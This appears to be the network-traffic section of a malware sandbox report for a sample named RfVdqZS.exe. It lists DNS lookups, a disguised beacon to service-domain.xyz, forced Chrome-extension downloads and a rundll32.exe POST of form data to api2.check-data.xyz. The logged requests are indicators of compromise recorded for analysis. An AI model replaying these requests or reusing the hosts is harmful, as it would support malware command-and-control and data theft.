                                                                                                                                                                                                                      GET /google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4 HTTP/1.1
                                                                                                                                                                                                                      Host: service-domain.xyz
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:14:18 GMT
                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                      Content-Length: 473
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                      Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200
                                                                                                                                                                                                                      Set-Cookie: AWSELBCORS=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9820401D99493DFDF796F3DAB0062EEFB3E4A533F5B2753F2532FBA9D17E5754692E8600D254000879A4CE3001E279F1EF5;PATH=/;MAX-AGE=43200;SECURE;SAMESITE=None
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      ec2-54-210-117-250 compute-1 amazonawscom
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      172.210.232.199.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      172.210.232.199.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      a23-55-97-11deploystaticakamaitechnologiescom
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      73.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      73.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      73.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      a2-18-190-73deploystaticakamaitechnologiescom
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      202.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      202.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      202.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      lhr25s33-in-f101e100net
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      67.169.217.172.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      67.169.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      67.169.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      lhr48s09-in-f31e100net
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      clients2.google.com
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      clients2.google.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      clients2.google.com
                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                      clients.l.google.com
                                                                                                                                                                                                                      clients.l.google.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      142.250.187.238
                                                                                                                                                                                                                    • flag-gb
                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                      https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      142.250.187.238:443
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX HTTP/1.1
                                                                                                                                                                                                                      Host: clients2.google.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-nWCdI5BWl5wsB6dsY2rW0A' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:14:20 GMT
                                                                                                                                                                                                                      Location: https://clients2.googleusercontent.com/crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                      Server: GSE
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      clients2.googleusercontent.com
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      clients2.googleusercontent.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      clients2.googleusercontent.com
                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                      googlehosted.l.googleusercontent.com
                                                                                                                                                                                                                      googlehosted.l.googleusercontent.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      172.217.16.225
                                                                                                                                                                                                                    • flag-gb
                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                      https://clients2.googleusercontent.com/crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      172.217.16.225:443
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      GET /crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 26186
                                                                                                                                                                                                                      X-GUploader-UploadID: ABPtcPodvGf8iQqO4kKm1Lfp9MKOXhsM2BTzYasMABO4u3APpZEDAuzFgoTJQtGapgkR6ywOKuA
                                                                                                                                                                                                                      X-Goog-Hash: crc32c=i5zIOg==
                                                                                                                                                                                                                      Server: UploadServer
                                                                                                                                                                                                                      Date: Thu, 16 May 2024 00:29:51 GMT
                                                                                                                                                                                                                      Expires: Fri, 16 May 2025 00:29:51 GMT
                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                      Age: 85469
                                                                                                                                                                                                                      Last-Modified: Fri, 31 Mar 2023 12:41:59 GMT
                                                                                                                                                                                                                      ETag: eefd433b_0ed85c7c_6772d0c2_d374e578_c3d87100
                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                    • flag-gb
                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                      https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      172.217.16.225:443
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      GET /crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Host: clients2.googleusercontent.com
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Content-Length: 194498
                                                                                                                                                                                                                      X-GUploader-UploadID: ABPtcPrlFw62HAId0j_vcCtlP9_A7dzr7QXfLbvW2rzxxrDZibbREcPrzmhOAGOerwH5bj7xjss
                                                                                                                                                                                                                      X-Goog-Hash: crc32c=mShFKQ==
                                                                                                                                                                                                                      Server: UploadServer
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:11:12 GMT
                                                                                                                                                                                                                      Expires: Sat, 17 May 2025 00:11:12 GMT
                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                      Last-Modified: Wed, 10 Apr 2024 11:10:42 GMT
                                                                                                                                                                                                                      ETag: b420c631_69a7cd6f_729649d6_7e259f5c_58c38719
                                                                                                                                                                                                                      Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                      Age: 188
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                    • flag-gb
                                                                                                                                                                                                                      GET
                                                                                                                                                                                                                      https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      142.250.187.238:443
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      GET /service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd HTTP/1.1
                                                                                                                                                                                                                      Host: clients2.google.com
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-qk3xlLmhD9ktxFsh1jizLQ' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:14:20 GMT
                                                                                                                                                                                                                      Location: https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                      Server: GSE
                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      lhr25s34-in-f141e100net
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      lhr48s28-in-f11e100net
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      mad08s04-in-f1�H
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      rundll32.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      IN CNAME
                                                                                                                                                                                                                      checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                                                                                      checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      44.235.138.214
                                                                                                                                                                                                                      checkdata-1114476139.us-west-2.elb.amazonaws.com
                                                                                                                                                                                                                      IN A
                                                                                                                                                                                                                      44.237.26.169
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      POST
                                                                                                                                                                                                                      http://api2.check-data.xyz/api2/google_api_ifi
                                                                                                                                                                                                                      rundll32.exe
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      44.235.138.214:80
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      POST /api2/google_api_ifi HTTP/1.1
                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/0 Safari/537.36
                                                                                                                                                                                                                      Host: api2.check-data.xyz
                                                                                                                                                                                                                      Content-Length: 722
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      HTTP/1.1 200 OK
                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                      Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                      Date: Fri, 17 May 2024 00:16:03 GMT
                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                      Set-Cookie: AWSELB=9327DF5F0AF3D375CDC9DE0AFF98FDC82A9589C9824CDF98F06272B58281A369C0E7C7AE6EC5781D948882C8767BA08E2574E7340BD1AEA80ADD88F1586867317B7C62D227;PATH=/;MAX-AGE=43200
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      ec2-44-235-138-214 us-west-2compute amazonawscom
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      11.227.111.52.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      11.227.111.52.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                      77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      a2-18-190-77deploystaticakamaitechnologiescom
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                      Response
                                                                                                                                                                                                                    • flag-us
                                                                                                                                                                                                                      DNS
                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa
                                                                                                                                                                                                                      Remote address:
                                                                                                                                                                                                                      8.8.8.8:53
                                                                                                                                                                                                                      Request
                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa
                                                                                                                                                                                                                      IN PTR
                                                                                                                                                                                                                    • 54.210.117.250:443
                                                                                                                                                                                                                      https://service-domain.xyz/google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4
                                                                                                                                                                                                                      tls, http
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      982 B
                                                                                                                                                                                                                      4.5kB
                                                                                                                                                                                                                      11
                                                                                                                                                                                                                      9

                                                                                                                                                                                                                      HTTP Request

                                                                                                                                                                                                                      GET https://service-domain.xyz/google_ifi_ico.png?rnd=kp4ev2oMK8Bdn3my8MuG_DILC6QHLC4RGLC9PHLC6SHLC6QHLC7AILC5SHLC7RGLC7HKLC4

                                                                                                                                                                                                                      HTTP Response

                                                                                                                                                                                                                      200
                                                                                                                                                                                                                    • 142.250.187.238:443
                                                                                                                                                                                                                      https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX
                                                                                                                                                                                                                      tls, http
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      1.3kB
                                                                                                                                                                                                                      9.0kB
                                                                                                                                                                                                                      15
                                                                                                                                                                                                                      12

                                                                                                                                                                                                                      HTTP Request

                                                                                                                                                                                                                      GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Doikgcnjambfooaigmdljblbaeelmekem%26installsource%3Dondemand%26uc&HbYhpkqLFX

                                                                                                                                                                                                                      HTTP Response

                                                                                                                                                                                                                      302
                                                                                                                                                                                                                    • 172.217.16.225:443
                                                                                                                                                                                                                      https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx
                                                                                                                                                                                                                      tls, http
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      9.4kB
                                                                                                                                                                                                                      243.2kB
                                                                                                                                                                                                                      183
                                                                                                                                                                                                                      178

                                                                                                                                                                                                                      HTTP Request

                                                                                                                                                                                                                      GET https://clients2.googleusercontent.com/crx/blobs/AcO95ogHLJx8Cue3SQk2Qva6QXL97HnaoWLVQtuqGjk16HdJR3slygJ9a35qLWvrXYjtRILB2QsDwVag7EWtRmBIG88iqHGeLexvFXov2Qv7mHmxIY9hAMZSmuUiy0FSLm58L82TEea6NttLURUViQ/OIKGCNJAMBFOOAIGMDLJBLBAEELMEKEM_2_0_0_3.crx

                                                                                                                                                                                                                      HTTP Response

                                                                                                                                                                                                                      200

                                                                                                                                                                                                                      HTTP Request

                                                                                                                                                                                                                      GET https://clients2.googleusercontent.com/crx/blobs/AcO95ohaC-xb4JinR2L4xgBx_5P4NMMnlZXGRZ4GjqnBcE8u741f1pdJ31FM2ex9Dvux2mtSp7o2vOdNG-CbKy3AC_WD1qDBw50OF9sajxCUot_w99GEeDq9lDicrEa-3XEAxlKa5aVT124pqHTvFk349CQSNcXYbZDC/IBLKHHACNMPKHKDDGDJNNIJNABFEFGOE_1_0_0_0.crx

                                                                                                                                                                                                                      HTTP Response

                                                                                                                                                                                                                      200
                                                                                                                                                                                                                    • 142.250.187.238:443
                                                                                                                                                                                                                      https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd
                                                                                                                                                                                                                      tls, http
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      1.3kB
                                                                                                                                                                                                                      1.9kB
                                                                                                                                                                                                                      10
                                                                                                                                                                                                                      7

                                                                                                                                                                                                                      HTTP Request

                                                                                                                                                                                                                      GET https://clients2.google.com/service/update2/crx?response=redirect&os=win&arch=x86&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=59.0.3071.86&lang=en-US&acceptformat=crx2,crx3&x=id%3Diblkhhacnmpkhkddgdjnnijnabfefgoe%26installsource%3Dondemand%26uc&vmYDASNdmd

                                                                                                                                                                                                                      HTTP Response

                                                                                                                                                                                                                      302
                                                                                                                                                                                                                    • 44.235.138.214:80
                                                                                                                                                                                                                      http://api2.check-data.xyz/api2/google_api_ifi
                                                                                                                                                                                                                      http
                                                                                                                                                                                                                      rundll32.exe
                                                                                                                                                                                                                      1.2kB
                                                                                                                                                                                                                      536 B
                                                                                                                                                                                                                      5
                                                                                                                                                                                                                      3

                                                                                                                                                                                                                      HTTP Request

                                                                                                                                                                                                                      POST http://api2.check-data.xyz/api2/google_api_ifi

                                                                                                                                                                                                                      HTTP Response

                                                                                                                                                                                                                      200
                                                                                                                                                                                                                    • 52.111.227.14:443
                                                                                                                                                                                                                      322 B
                                                                                                                                                                                                                      7
                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      service-domain.xyz
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      64 B
                                                                                                                                                                                                                      80 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      service-domain.xyz

                                                                                                                                                                                                                      DNS Response

                                                                                                                                                                                                                      54.210.117.250

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      73 B
                                                                                                                                                                                                                      129 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      250.117.210.54.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      172.210.232.199.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      74 B
                                                                                                                                                                                                                      128 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      172.210.232.199.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      70 B
                                                                                                                                                                                                                      133 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      11.97.55.23.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      73.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      70 B
                                                                                                                                                                                                                      133 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

